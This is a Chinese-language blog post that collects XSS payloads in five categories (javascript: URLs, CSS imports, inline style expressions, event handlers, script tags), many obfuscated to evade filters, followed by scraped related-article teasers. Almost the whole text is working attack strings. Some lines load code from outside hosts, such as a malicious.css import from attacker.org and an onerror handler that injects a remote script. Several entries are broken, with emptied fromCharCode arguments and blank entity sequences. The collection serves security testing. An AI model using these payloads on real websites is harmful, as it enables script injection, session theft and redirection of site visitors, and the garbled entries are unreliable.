收集的一些XSS payload,主要分为五大类,便于查阅。

#第一类:Javascript URL

<a href="javascript:alert('test')">link</a>

<a href="javascript:alert('xss')">link</a>

<a href='vbscript:MsgBox("XSS")'>link</a>

<a href="vbscript:alert(1)">Hello</a>

<a href="vbscript:alert(1)">Hello</a>

<a href=javascript:alert(&quot;XSS&quot;)>link</a>

<a href=`javascript:alert("RSnake says,'XSS'")`>link</a>

<a href=javascript:alert(String.fromCharCode(,,))>link</a>

<a href="javascript&colon;alert(1)">link</a>

<a href="javaSCRIPT&colon;alert(1)">Hello</a>

<a href="javasc&NewLine;ript&colon;alert(1)">link</a>

<a href="javas&Tab;cript:\u0061lert(1);">Hello</a>

<a href="jav    ascript:alert('XSS')">link</a>

<a href="jav	ascript:alert('XSS')">link</a>

<a href="jav
ascript:alert('XSS')">link</a>

<a href=" &#14;  javascript:alert('XSS');">link</a>

<a href="javascript:\u0061lert(1&#x29">Hello</a>

<a href="javascript:confirm`1`">link</a>

<a href="javascript:confirm(1)">link</a>

<a href="j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)"></a>

<a href="javascript:%61%6c%65%72%74%28%31%29">link</a>

<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">link</a>

<a href=javascript:eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></a>

<a href=javascript:eval("alert('xss')")>link</a>

<a href=&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;&#;>link</a>

<a href=&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#&#>link</a>

<a href=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>link</a>

<a href="data:text/html;base64,amF2YXNjcmlwdDphbGVydCgxKQ==">test</a>

<a href=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></a>

<iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

#第二类:CSS import

<style>@import url("http://attacker.org/malicious.css");</style>

<style>@imp\ort url("http://attacker.org/malicious.css");</style>

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<STYLE>@import'http://jb51.net/xss.css';</STYLE>

#第三类:Inline style

<div style="color: expression(alert('XSS'))">

<div style=color:expression\(alert())></div>

<div style="color: '<'; color: expression(alert('XSS'))">

<div style=X:expression(alert(/xss/))>

<div style="x:\65\78\70\72\65\73\73\69\6f\6e(alert(1))">

<div style="x:\000065\000078\000070\000072\000065\000073\000073\000069\00006f\00006e(alert(1))">

<div style="x:\65\78\70\72\65\73\73\69\6f\6e\028 alert \028 1 \029 \029">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

<div style="z:exp/*anything*/res/*here*/sion(alert(1))">

<div style=xss:expr/*XSS*/ession(alert('XSS'))>

</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.baidu.com")>

<img STYLE="background-image:url(javascript:alert('XSS'))"> //ie6

<img STYLE="background-image:\75\72\6c\28\6a\61\76\61\73\63\72\69\70\74\3a\61\6c\65\72\74\28\27\58\53\53\27\29\29">

<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

#第四类:JavaScript 事件

<div onclick="alert('xss')">

<div onmouseenter="alert('xss')">

<div onclick ="alert('xss')">

<BODY ONLOAD=alert('XSS')>

<img src= onerror=alert()>

<img/src=''/onerror=alert()>

<img src="" onerror="alert(1)" />

<img src= alt=al lang=ert onerror=top[alt+lang]()>

<img src="" onerror=eval("\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29")></img>

<img src= onmouseover=alert('xss') a1=>

<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='http://t.cn/R5UpyOt';>

<a href="#" onclick=alert('\170\163\163')>test</a>

<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074(1)">link</a>

<a href="#" onclick="\u0061\u006C\u0065\u0072\u0074`a`">link</a>

<a href="#" onclick="alert('xss')">link</a>

<marquee onscroll=alert()> test</marquee>

<div  style="width:100px;height:100px;overflow:scroll" onscroll="alert('a')"> <br/><br/><br/><br/><br/></div>

<DIV onmousewheel="alert('a')" ></DIV><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/><br/>

<div style="background-color:red" onmouseenter="alert('a')"></div>

<DIV onmouseleave="alert('1')"></DIV>

<div contentEditable="true" style="background-color:red" onfocusin="alert('a')" >asdf</div>

<div contentEditable="true" style="background-color:red" onfocusout="alert('bem')" >asdf</div>

<marquee onstart="alert('a')" >asdf</marquee>

<div style="background-color:red;" onbeforecopy="alert('a')" >asdf</div>

<div style="background-color:red;" onbeforecut="alert('a')" >asdf</div>

<div style="background-color:red;" contentEditable="true" onbeforeeditfocus="alert('a')" >asdf</div>

<div style="background-color:red;" ="true" onbeforepaste="alert('a')" >asdf</div>

<div style="background-color:red;" oncontextmenu="alert('a')" >asdf</div>

<div style="background-color:red;" oncopy="alert('a')" >asdf</div>

<div contentEditable="true" style="background-color:red;" oncut="alert('a')" >asdf</div>

<div style="background-color:red;" ondrag="alert('1')" >asdf</div>

<div style="background-color:red;" ondragend="alert('a')" >asdf</div>

<div style="background-color:red;" ondragenter="alert('b')" >asdf</div>

<div contentEditable="true" style="background-color:red;" ondragleave="alert('a')" >asdf</div>

<div contentEditable="true" style="background-color:red;" ondragover="alert('b')" >asdf</div>

<div contentEditable="true" style="background-color:red;" ondragstart="alert('a')" >asdf</div>

<div contentEditable="true" style="background-color:red;" ondrop="alert('b')" >asdf</div> <div contentEditable="true" style="background-color:green;" ondrop="alert('bem')" >asdf</div>

<div contentEditable="true" style="background-color:red;" onlosecapture="alert('b')">asdf</div>

<div contentEditable="true" style="background-color:red;" onpaste="alert('a')" >asdf</div>

<div contentEditable="true" style="background-color:red;" onselectstart="alert('a')" >asdf</div>

<div contentEditable="true" style="background-color:red;" onhelp="alert('a')" >asdf</div>

<div STYLE="background-color:red;behavior:url('#default#time2')" onEnd="alert('a')">asdf</div>

<div STYLE="background-color:red;behavior:url('#default#time2')" onBegin="alert('a')">asdf</div>

<div contentEditable="true" STYLE="background-color:red;" onactivate="alert('b')">asdf</div>

<div contentEditable="true" STYLE="background-color:red;filter: Alpha(opacity=100, style=2);"onfilterchange="alert('b')">asdf</div>

<div contentEditable="true" onbeforeactivate="alert('b')">asdf</div>

<div contentEditable="true" onbeforedeactivate="alert('a')">asdf</div>

<div contentEditable="true" ondeactivate="alert('bem')">asdf</div>

<video src="http://www.w3schools.com/html5/movie.ogg" onloadedmetadata="alert(1)" />

<video src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)" />

<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)">

<audio src="http://www.w3schools.com/html5/movie.ogg" onloadstart="alert(1)"></audio>

<body onscroll=alert()><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>

<input type="hidden" accesskey="X" onclick="alert(/xss/)">

#第五类:Script 标签

<script src="http://baidu.com"></script>

<script>alert("XSS")</script>

<scr<script>ipt>alert("XSS")</scr<script>ipt>

<SCRIPT>a=/XSS/ alert(a.source)</SCRIPT>

<script>alert(//.source)</script>

<script>alert();</script>

<script>prompt();</script>

<script>confirm();</script>

<script>alert(//)</script>

<script>alert(`a`)</script>

<script>alert('a')</script>

<SCRIPT>alert(String.fromCharCode(,,))</SCRIPT>

<script>eval(alert())</script>

<script>eval(String.fromCharCode(, , , , , , , , , ))</script>

<script>eval("\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029")</script>

<script>eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>

<script>setTimeout('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>

<script>setTimeout(alert(),)</script>

<script>setTimeout`alert\x28\x27 xss \x27\x29`</script>

<script>setInterval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')</script>

<script src=data:text/javascript,alert()></script>

<script src=&#&#&#&#:text/javascript,alert()></script>

<script>\u0061\u006C\u0065\u0072\u0074()</script>

<script>\u0061\u006C\u0065\u0072\u0074()</script>

<script>\u0061\u006C\u0065\u0072\u0074`a`</script>

<script>window['alert']()</script>

<script>parent['alert']()</script>

<script>self['alert']()</script>

<script>top['alert']()</script>

<!--[if]><script>alert()</script     -->

<script>alert("xss");;;;;;;;;;;;;;;;;    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>

<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>

<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>

关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

XSS payload 大全的更多相关文章

  1. xss payload大全

    刚好刚才在fuzz一个站的时候用到,就从笔记里抛出来了. code: (1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js> ...

  2. ES6中的模板字符串和新XSS Payload

    ES6中的模板字符串和新XSS Payload 众所周知,在XSS的实战对抗中,由于防守方经常会采用各种各样严格的过滤手段来过滤输入,所以我们使用的XSS Payload也会根据实际情况作出各种各样的 ...

  3. XSS Payload知识备忘

    参考资料:<白帽子讲Web安全>吴翰清 著 参见: 百度百科 http://baike.baidu.com/view/50325.htm 维基百科 http://zh.wikipedia. ...

  4. xss payload

    xss payload可以使用富客户端文本书写,大多数用javascript,少部分用actionscript等等. 1.盗取cookie,发起cookie劫持 使用xss漏洞插入cookie.js ...

  5. 1.8 收集的XSS Payload

    收集的XSS Payload ,可以做成字典,到时候批量测试:--------------------------------------------------------------------- ...

  6. Web安全系列(二):XSS 攻击进阶(初探 XSS Payload)

    什么是 XSS Payload 上一章我谈到了 XSS 攻击的几种分类以及形成的攻击的原理,并举了一些浅显的例子,接下来,我就阐述什么叫做 XSS Payload 以及从攻击者的角度来初探 XSS 攻 ...

  7. XSS Payload深入分析整理

    几种加载XSS Payload的不常见标签 众所周知,一种调用JavaScript的方法就是在元素类型上使用事件处理器(Event Handler),通常的一种方法类似: <img src=x ...

  8. 【命令汇总】XSS payload 速查表

    日期:2019-05-15 14:06:21 作者:Bay0net 介绍:收集并且可用的一些 XSS payload,网上的速查表很多,但是测试了下很多 payload 的不可用,这里都是自己能用的 ...

  9. xssless - 自动化的XSS payload攻击器

    XSSLESS 一个用Python编写的自动化XSS 负载(payload)攻击器 用法: 记录请求 并结合Burp proxy 选择你想生成的请求,然后右键选择“保存项目” 使用xssless生成你 ...

随机推荐

  1. webpack9--删除冗余的CSS

    我们在写代码的时候可能有些CSS并没有用到,我们如何利用webpack将冗余的CSS清除掉呢? 可以使用 purifycss-webpack 达到该目的. 1.安装 purifycss-webpack ...

  2. 微信小程序——时间戳的转换及调用

    开发微信小程序网盘功能模块的时候,需要获取到网盘文件夹创建的时间.如下图: 但是请求返回的数据是一段时间戳,如下图: 所以我们只能通过js把时间戳转换成时间格式. 在小程序官网的Demo的utils. ...

  3. 开始一段新的敏捷学习之旅 —— IT帮读书会第4期《Scrum实战》

    刚看了一下,距离上一次写博客过去快1年半了.之前的知识管理都放到笔记软件中了,但是现在看来,收藏了很多东西,输入很多,但是输出有限. 学习任何领域的知识,如果只有输入没有输出,效果都是很有限的,有时需 ...

  4. Qt判断操作系统代码

    Qt4的时候是如下宏定义.Qt5,有所不同.   #include <QtGlobal> ... #ifdef Q_OS_MAC // mac #endif #ifdef Q_OS_LIN ...

  5. 阐述:SIP协议是什么

    sip协议是什么?可能刚刚接触这个协议的朋友会掌握不好它的定义.那么首先我们要了解一下,目前企业中大多数VoIP应用都使用H.323协议,但是,随着越来越多的企业研究SIP协议,不久的将来基于SIP协 ...

  6. java_review_point

    Math.atan2() 这个函数很常用,可以实现利用点的坐标x,y来计算点的弧度值. 本质来说,是一个反tan函数. this 指类的对象,区别于局部的变量. static方法可以在类里面任意调用, ...

  7. GLSL着色语言学习。橙皮书第一个例子GLSL+OpenTK+F#的实现。

    Opengl红皮书有选择的看了一些,最后的讲着色语言GLSL的部分看的甚为不理解,然后找到Opengl橙皮书,然后就容易理解多了. 在前面,我们或多或少接触到Opengl的处理过程,只说前面一些处理, ...

  8. vi 新建文件后保存文件时遇到的问题:E212: 无法打开并写入文件

    问题描述 使用vi编辑器写好内容后保存并退出时遇到以下问题 解决方案 该问题的原因是用户权限不够,因为普通用户用 vi 不能保存文件,需要使用超级用户才可以. 先转换为超级用户:su 再用vi打开文件 ...

  9. python_django_sae入口配置

    --index.wsgi import sys import os.path os.environ['DJANGO_SETTINGS_MODULE'] = 'APPNAME.settings' sys ...

  10. EF5+MVC4系列(8) ActionResult的返回值

    我们在MVC的代码中,经常会看到这样的一个 代码 可能有人会有疑问,既然我定义的是ActionResult,为什么返回值会是View方法呢? 其实这个View方法的返回值的类型是ActionResul ...